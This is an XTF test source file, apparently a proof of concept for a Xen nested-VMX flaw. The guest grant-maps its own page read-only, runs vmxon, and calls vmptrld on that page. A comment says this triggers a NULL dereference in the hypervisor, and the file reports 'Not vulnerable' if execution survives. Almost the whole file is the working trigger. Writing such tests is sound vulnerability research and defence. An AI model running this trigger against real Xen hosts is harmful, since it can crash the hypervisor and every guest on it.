/**
 * @file tests/poc-nested-vmx-shadow-vmcs-vmptrld-nullderef/main.c
 * @ref test-poc-nested-vmx-shadow-vmcs-vmptrld-nullderef
 *
 * @page test-poc-nested-vmx-shadow-vmcs-vmptrld-nullderef POC-NESTED-VMX-SHADOW-VMCS-VMPTRLD-NULLDEREF
 *
 * Advisory: [FIXME](FIXME)
 *
 * @todo Docs for test-poc-nested-vmx-shadow-vmcs-vmptrld-nullderef
 *
 * @see tests/poc-nested-vmx-shadow-vmcs-vmptrld-nullderef/main.c
 */
#include <xtf.h>
#include <arch/vmx.h>

const char test_title[] = "POC-NESTED-VMX-SHADOW-VMCS-VMPTRLD-NULLDEREF PoC";

uint8_t grant_frame[PAGE_SIZE] __page_aligned_bss;

uint8_t vmxon_region[PAGE_SIZE] __page_aligned_bss;

uint8_t vmcs[PAGE_SIZE] __page_aligned_bss;

/*
 * Extentions on top of regular EXINFO.
 *
 * Use EXINFO_AVAIL{0,1} for VMFail{Invalid,Valid}.  (ab)use the fact that
 * VMFailValid means no exception occured to stash the VMX Instruction Error
 * code in the low bits, normally used for vector/error_code information.
 */
#define VMERR_SUCCESS      0
#define VMERR_INVALID      (EXINFO_EXPECTED | EXINFO_AVAIL0)
#define VMERR_VALID(x)     (EXINFO_EXPECTED | EXINFO_AVAIL1 | ((x) & 0xffff))

static exinfo_t get_vmx_insn_err(void)
{
    unsigned long err;

    asm ("vmread %[field], %[value]"
         : [value] "=rm" (err)
         : [field] "r" (VMCS_VM_INSN_ERR + 0ul));

    return VMERR_VALID(err);
}

/* Clear a VMCS / VMXON region, and set a specific revision id. */
static inline void clear_vmcs(void *_vmcs, uint32_t rev)
{
    uint32_t *vmcs = _vmcs;

    memset(vmcs, 0, PAGE_SIZE);
    vmcs[0] = rev;
}

exinfo_t stub_vmptrld(uint64_t paddr)
{
    exinfo_t ex = 0;
    bool fail_valid = false, fail_invalid = false;

    asm volatile ("1: vmptrld %[paddr];"
                  ASM_FLAG_OUT(, "setc %[fail_invalid];")
                  ASM_FLAG_OUT(, "setz %[fail_valid];")
                  "2:"
                  _ASM_EXTABLE_HANDLER(1b, 2b, %P[rec])
                  : "+D" (ex),
                    ASM_FLAG_OUT("=@ccc", [fail_invalid] "+rm") (fail_invalid),
                    ASM_FLAG_OUT("=@ccz", [fail_valid]   "+rm") (fail_valid)
                  : [paddr] "m" (paddr),
                    [rec] "p" (ex_record_fault_edi));

    if ( ex )
        return ex;
    else if ( fail_invalid )
        return VMERR_INVALID;
    else if ( fail_valid )
        return get_vmx_insn_err();
    else
        return VMERR_SUCCESS;
}

exinfo_t stub_vmxon(uint64_t paddr)
{
    exinfo_t ex = 0;
    bool fail_valid = false, fail_invalid = false;

    asm volatile ("1: vmxon %[paddr];"
                  ASM_FLAG_OUT(, "setc %[fail_invalid];")
                  ASM_FLAG_OUT(, "setz %[fail_valid];")
                  "2:"
                  _ASM_EXTABLE_HANDLER(1b, 2b, %P[rec])
                  : "+D" (ex),
                    ASM_FLAG_OUT("=@ccc", [fail_invalid] "+rm") (fail_invalid),
                    ASM_FLAG_OUT("=@ccz", [fail_valid]   "+rm") (fail_valid)
                  : [paddr] "m" (paddr),
                    [rec] "p" (ex_record_fault_edi));

    if ( ex )
        return ex;
    else if ( fail_invalid )
        return VMERR_INVALID;
    else if ( fail_valid )
        return get_vmx_insn_err();
    else
        return VMERR_SUCCESS;
}

void test_main(void)
{
    printk("Starting up nested VMX VMCS-shadowing vmptrld nullptr deref test!\n");
    
    /* TODO: check Xen shadow VMCS capability */

    /* VMX code adapted from test nested-vmx */
    if ( !cpu_has_vmx )
        return xtf_skip("Skip: VT-x not available\n");

    if ( !vendor_is_intel )
        xtf_warning("Warning: VT-x found on non-Intel processor\n");

    /* Fetch domid via hypervisor leaf */
    uint32_t tmp, domid;
    cpuid(0x40000004, &tmp, &tmp, &domid, &tmp);

    /* Grant table code adapted from test XSA 224 */
    int rc = xtf_init_grant_table(1);

    if ( rc )
        return xtf_error("Error initialising grant table: %d\n", rc);

    /*
     * Construct gref 8 to allow frame[] to be mapped by ourselves.
     */
    gnttab_v1[8].domid = (domid_t) domid;
    gnttab_v1[8].frame = virt_to_gfn(grant_frame);
    smp_wmb();
    gnttab_v1[8].flags = GTF_permit_access;

    struct gnttab_map_grant_ref map = {
        .host_addr = (unsigned long) &grant_frame,
        /* Map as grant map read-only to trigger writable == false */
        .flags = GNTMAP_host_map | GNTMAP_readonly,
        .ref = 8,
        .dom = (domid_t) domid,
    };

    rc = hypercall_grant_table_op(GNTTABOP_map_grant_ref, &map, 1);

    if ( rc )
        return xtf_error("Error mapping %p as p2m_grant_map_ro: %d\n", &grant_frame, rc);

    msr_vmx_basic_t basic = { rdmsr(MSR_VMX_BASIC) };

    uint32_t vmcs_revid = basic.vmcs_rev_id;

    unsigned long cr4 = read_cr4();

    /* Enable VMX instructions */
    if ( !(cr4 & X86_CR4_VMXE) )
        write_cr4(cr4 | X86_CR4_VMXE);

    clear_vmcs(vmxon_region, vmcs_revid);

    exinfo_t ex = stub_vmxon(_u(vmxon_region));
    if (ex) 
        return xtf_failure("Fail: unexpected vmxon failure %08x\n", ex);

    /* Try to load VMCS with p2m write discard, resulting in NULL deref */
    ex = stub_vmptrld(_u(grant_frame));

    xtf_success("Not vulnerable");
}

/*
 * Local variables:
 * mode: C
 * c-file-style: "BSD"
 * c-basic-offset: 4
 * tab-width: 4
 * indent-tabs-mode: nil
 * End:
 */
